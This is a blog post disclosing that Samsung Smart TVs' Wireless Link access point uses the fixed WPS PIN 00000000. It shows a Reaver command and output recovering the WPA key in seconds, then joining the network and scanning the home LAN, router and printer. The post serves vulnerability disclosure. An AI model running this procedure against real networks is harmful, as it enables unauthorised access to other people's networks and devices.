(Or wtf is SEC_Linkshare?)

Samsung Smart TVs have the ability to connect to other devices using wifi – you can turn this feature on in the Network settings on the TV.

TVShot

This could, for instance allow you to use an iPhone app as a remote control for the TV or play a slideshow from your smartphone.

But if you enable this feature you’ll suddenly find a new wireless SSID in your area called SEC_Linkshare_xxxxxx.

SSID

This is your Samsung TV operating as a Wireless Access Point and it presents a massive security risk to your network.

To connect devices to the TV it uses Wireless Protected Setup (WPS) – a quick and easy way to pair wifi devices. However, hacking WPS devices became extremely easy in December 2011 when a tool called Reaver was released by Tactical Network Solutions, enabling anyone to discover the WPA password within a few hours on most WPS enabled routers. Samsung make this problem even worse with the Smart TV because it uses a WPS pin of 00000000 which of course is one of the first ones Reaper will try and so you can discover the SEC_Linkshare_xxxxxx WPA key in less than 10 seconds!

Here’s the output from Terminal showing Reaver hacking my TV in 5 seconds flat:

john@VIAO:~$ sudo reaver -i mon3 -b E4:E0:C5:05:D5:68 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions,
Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from E4:E0:C5:05:D5:68
[+] Switching mon3 to channel 1
[+] Associated with E4:E0:C5:05:D5:68 (ESSID: SEC_LinkShare_419a94)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00000000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 5 seconds
[+] WPS PIN: '00000000'
[+] WPA PSK: 'ngYWQnHzxa86JxF9QOiWxrLn0eWa31'
[+] AP SSID: 'SEC_LinkShare_419a94'
john@VIAO:~$

 

Once a hacker knows the wifi password (WPA PSK)  to the Samsung’s AP you will be able to join the network, see all other devices and browse the Internet.

Screen shot 2014-04-05 at 20.31.37

Join the network using the discovered key.

Wifi networks

Here you can see my MacBook using this connection.

connected

DHCP will obtain an IP address from the TV (10.123.12.128 in this case) it’s on a different subnet to the LAN that the TV is connected to but nevertheless it routes through to the home LAN.

Scanning the network will show other devices:

scanner

It’s not possible to re-configure the AP or disable WPS so if you don’t want your neighbour on your broadband connection (or worse) I’d advise disabling the Samsung Wireless Link asap.

Here’s a demo of the iPhone connected to the Samsung TV – as you can see it gets IP address 10.123.12.128

2014-04-06 13.11.16 2014-04-06 13.06.41

Although the iPhone is on a different subnet to the TV’s LAN network you can still scan the LAN if you can guess the range.

2014-04-06 13.08.19

Now we know what else is on the network we can scan for open ports, log into the broadband router or perhaps the printer’s webpage:

2014-04-06 13.12.44  2014-04-06 13.13.50

From there, some printers may even give access to previously printed jobs. As you can see this is a huge (poorly publicised*) security risk.

[The only other report I’ve found regarding this issue is here: http://www.oeioei.nl/internet/tvlek.php]

Further reading: http://steveshank.com/cgi-bin/article.pl?aid=373